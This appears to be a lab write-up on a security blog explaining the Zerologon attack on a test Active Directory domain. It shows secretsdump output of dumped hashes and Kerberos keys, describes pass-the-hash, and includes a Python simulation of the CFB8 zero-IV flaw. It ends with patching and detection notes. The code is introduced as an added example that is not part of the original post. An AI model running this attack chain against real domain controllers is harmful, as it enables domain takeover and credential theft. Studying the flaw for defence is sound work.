
Wednesday, October 13, 2021

Active Directory CORPORATIVE.domain.local Series[X] : Zerologon attack

Hi everyone!


In this post I am going to explain how to perform the Zerologon attack against Active Directory in my local lab environment, CORPORATIVE.DOMAIN.local.




This vulnerability was disclosed in 2020. It allows a remote, unauthenticated attacker to reset the machine account password of a domain controller and, with that account, dump every credential hash stored in the Active Directory database (NTDS.dit) of the target Windows Server:

CVE-2020-1472


The first step is to check whether the target domain controller is vulnerable. A Python checker script is used for this task: it repeats the Netlogon authentication handshake (NetrServerReqChallenge followed by NetrServerAuthenticate3) with an all-zero client challenge and an all-zero client credential, and reports the DC as vulnerable if one of the attempts is accepted:


Once the check confirms the target is vulnerable, the exploit uses the same forged credential to call NetrServerPasswordSet2 and reset the domain controller's machine account password to an empty string. Authenticating as that machine account with an empty password, Impacket's secretsdump can then pull the NTDS.dit secrets through the DRSUAPI replication interface. The first output line, RemoteOperations failed ... rpc_s_access_denied, is expected: the machine account has no administrative SMB access to the DC, but as a domain controller account it holds replication rights, so secretsdump falls back to the DRSUAPI path:




Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrador:500:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CORPORATIVE.DOMAIN.local\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:74b9c26e436d8ceacd2db129dbed8091:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CORPORATIVE.DOMAIN.local\worker1:1106:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE.DOMAIN.local\worker2:1107:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE.DOMAIN.local\SVC_service:1109:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE.DOMAIN.local\NP_user:1110:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE.DOMAIN.local\test_user:1111:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE-DOM$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WKS-002$:1103:aad3b435b51404eeaad3b435b51404ee:26ea21a020599bf2757bdef562adbcc7:::
WKS-001$:1104:aad3b435b51404eeaad3b435b51404ee:efe101633fb3881f250d512d388cb700:::
[*] Kerberos keys grabbed
CORPORATIVE.DOMAIN.local\krbtgt:aes256-cts-hmac-sha1-96:178c2ad109c08f5f1396f956f899e65c8e3ca03e77ea180584e5b0c5ed5cd25e
CORPORATIVE.DOMAIN.local\krbtgt:aes128-cts-hmac-sha1-96:84edbefb34b31b613865a44d4bf66e05
CORPORATIVE.DOMAIN.local\krbtgt:des-cbc-md5:46a25ef4f8cbec0d
CORPORATIVE.DOMAIN.local\worker1:aes256-cts-hmac-sha1-96:4686da5eda179be4c46be0524b5590509408301b15a03150cc901d58dc25ea02
CORPORATIVE.DOMAIN.local\worker1:aes128-cts-hmac-sha1-96:a5272782e4809030425764777b89b377
CORPORATIVE.DOMAIN.local\worker1:des-cbc-md5:0816198940dae589
CORPORATIVE.DOMAIN.local\worker2:aes256-cts-hmac-sha1-96:fb1ac4dd6cdc58614db210da4296f60f4f76931c7ed783ba7d4c2d23ab6ae153
CORPORATIVE.DOMAIN.local\worker2:aes128-cts-hmac-sha1-96:f55967570c4b562cc3fdd696d37603cc
CORPORATIVE.DOMAIN.local\worker2:des-cbc-md5:5bb5cb23076e5eef
CORPORATIVE.DOMAIN.local\SVC_service:aes256-cts-hmac-sha1-96:53cb07135999888c62a8cf58a449cc24e89ad12c3dd5f26d373657947fc2578f
CORPORATIVE.DOMAIN.local\SVC_service:aes128-cts-hmac-sha1-96:08398a5e5779afef70121bd2fe8c5153
CORPORATIVE.DOMAIN.local\SVC_service:des-cbc-md5:5b29adb0efa81691
CORPORATIVE.DOMAIN.local\NP_user:aes256-cts-hmac-sha1-96:f537750e75139946ed51cfb8337314d127a17d3137a5ef8efec6b0becabebaac
CORPORATIVE.DOMAIN.local\NP_user:aes128-cts-hmac-sha1-96:07301297fb5aad297fb0a6b7bd2eeeed
CORPORATIVE.DOMAIN.local\NP_user:des-cbc-md5:a4296d1c2ce010c7
CORPORATIVE.DOMAIN.local\test_user:aes256-cts-hmac-sha1-96:d24ab0db83b636a6065d12d7451cbe5d8512a381caccac9e94ddd3ca2d0844d9
CORPORATIVE.DOMAIN.local\test_user:aes128-cts-hmac-sha1-96:48bf29b09e9d4753f58c9a249cc3ec4b
CORPORATIVE.DOMAIN.local\test_user:des-cbc-md5:15801c91c8a7ea29
CORPORATIVE-DOM$:aes256-cts-hmac-sha1-96:7ffab151f9fc7485b70447cab3373921338bf88906703fd5d4deb9d4a87fde16
CORPORATIVE-DOM$:aes128-cts-hmac-sha1-96:2d714652efe8aec574dd8ffce8e7ef8e
CORPORATIVE-DOM$:des-cbc-md5:a4e6b6ae5837806d
WKS-002$:aes256-cts-hmac-sha1-96:bc3ef9250185b6844385fae85f47c69e0e21f9e69a7ff2a9a5fd0fa28fdd91c9
WKS-002$:aes128-cts-hmac-sha1-96:c7431351b05123fcd6039f1611db23a4
WKS-002$:des-cbc-md5:32b6861998ba5e1c
WKS-001$:aes256-cts-hmac-sha1-96:57ee7e4e906c0fa2e8eea3b1dfadb4e6a4e036ae0c8e8b47728da431068a7efb
WKS-001$:aes128-cts-hmac-sha1-96:d34b1290f3df609fe9aa4d808004ee98
WKS-001$:des-cbc-md5:020be94686e05e07
[*] Cleaning up... 

Finally, the Administrador NT hash from the dump is used to authenticate with pass-the-hash, without cracking the password:








As the documentation below explains, this vulnerability exists because the function ComputeNetlogonCredential encrypts the challenge with AES-128 in CFB8 mode using an initialization vector fixed to sixteen zero bytes instead of a random value. With an all-zero client challenge, one session key in 256 produces an all-zero credential, and because the server picks a fresh challenge (and therefore a fresh session key) for every handshake, an attacker who always sends a zero challenge and a zero credential is accepted after about 256 attempts on average, without knowing the machine account password:

https://www.crowdstrike.com/blog/cve-2020-1472-zerologon-security-advisory/
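To make the 1-in-256 figure concrete, here is an added example (my own code, not part of the original post or of the CrowdStrike advisory) that implements CFB8 byte by byte on top of a 16-byte block function, applies it with the zero IV the protocol uses, and shows that whenever the first byte of E_k(0^16) is 0x00 the shift register never leaves the all-zero state, so the whole credential comes out as zeros. It uses real AES-128 if the cryptography package is installed and otherwise a clearly labelled SHA-256 stand-in (the property depends only on the CFB8 construction, not on the block function). The lab_key sequence and the seeded simulation are constructed for the demonstration and are not real session keys.

```python
"""Why Zerologon works: AES-CFB8 with an all-zero IV in ComputeNetlogonCredential."""
import hashlib
import random

try:
    # Real AES-128 block function when the 'cryptography' package is installed.
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def block_encrypt(key: bytes, block: bytes) -> bytes:
        enc = Cipher(algorithms.AES(key), modes.ECB(), backend=default_backend()).encryptor()
        return enc.update(block) + enc.finalize()
except ImportError:
    # Stand-in (assumption): the CFB8 property holds for ANY 16-byte keyed block
    # function, so offline we use SHA-256(key || block) truncated to 16 bytes.
    def block_encrypt(key: bytes, block: bytes) -> bytes:
        return hashlib.sha256(key + block).digest()[:16]

ZERO_IV = bytes(16)        # MS-NRPC fixes the CFB8 IV to sixteen zero bytes
ZERO_CHALLENGE = bytes(8)  # the client challenge the attacker chooses


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: ciphertext byte = plaintext byte XOR first byte of E_k(shift register);
    the ciphertext byte is then shifted into the register for the next byte."""
    shift = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ block_encrypt(key, bytes(shift))[0]
        out.append(c)
        shift = shift[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """The vulnerable primitive: CFB8 over the 8-byte challenge with a fixed zero IV."""
    return cfb8_encrypt(session_key, ZERO_IV, challenge)


def is_weak_key(key: bytes) -> bool:
    """If E_k(0^16) starts with 0x00, a zero challenge encrypts to all zeros:
    the first output byte is 0, the register stays 0^16, and every byte repeats it."""
    return block_encrypt(key, bytes(16))[0] == 0


def lab_key(i: int) -> bytes:
    """Deterministic constructed session key number i (not a real key)."""
    return hashlib.sha256(b"corporative-lab-session-key-%d" % i).digest()[:16]


def find_weak_key(start: int = 0):
    """Return the first weak lab key at or after `start` and how many keys were tried."""
    i = start
    while not is_weak_key(lab_key(i)):
        i += 1
    return lab_key(i), i - start + 1


def count_weak_keys(n: int) -> int:
    """How many of the first n lab keys are weak (expected about n/256)."""
    return sum(1 for i in range(n) if is_weak_key(lab_key(i)))


def simulate_zerologon(max_attempts: int = 5000, seed: int = 1472) -> int:
    """Attacker sends a zero challenge and a zero credential every round; the server
    derives a fresh session key per handshake (seeded RNG here, constructed). Returns
    the round on which the forged zero credential matches, or 0 if it never does."""
    rng = random.Random(seed)
    for attempt in range(1, max_attempts + 1):
        session_key = rng.getrandbits(128).to_bytes(16, "big")
        if compute_netlogon_credential(session_key, ZERO_CHALLENGE) == bytes(8):
            return attempt
    return 0


if __name__ == "__main__":
    key, tries = find_weak_key()
    print("weak key found after", tries, "keys:", key.hex())
    print("zero IV, zero challenge  :", compute_netlogon_credential(key, ZERO_CHALLENGE).hex())
    print("same key, non-zero IV    :", cfb8_encrypt(key, b"\x01" * 16, ZERO_CHALLENGE).hex())
    print("weak keys among 4096     :", count_weak_keys(4096))
    print("forged credential accepted on attempt", simulate_zerologon())
```

The non-zero-IV line is the point of the fix: with a random IV the register starts from unpredictable state, so a zero first byte no longer pins it at zero, and each of the eight credential bytes independently has to come out as 0x00, which takes the attacker from 2^8 to roughly 2^64 attempts.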

And that is all. Two practical notes before closing. First, the exploit cleared the DC machine account password stored in AD but not the copy the DC keeps locally, which is why CORPORATIVE-DOM$ shows the empty-password NT hash in the dump; the original password must be restored before leaving the lab, otherwise the mismatch causes authentication and replication failures for the DC. Second, Microsoft fixed the flaw in the August 2020 security updates and, since the February 2021 updates, domain controllers enforce secure RPC on every Netlogon channel by default; Event IDs 5827 to 5831 in the DC's System log show which clients are still attempting vulnerable connections. I hope all companies have applied the recommended vendor patches!

Best regards, f0ns1

 
